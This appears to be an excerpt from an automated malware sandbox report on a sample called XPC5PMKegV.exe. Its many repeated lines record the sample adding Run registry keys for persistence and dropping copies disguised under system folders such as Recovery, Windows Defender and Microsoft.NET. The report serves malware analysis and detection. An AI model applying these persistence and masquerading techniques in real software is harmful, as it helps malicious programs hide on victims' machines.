            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xMLVfJVxhYAkoCJJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess information set: NOOPENFILEERRORBOX
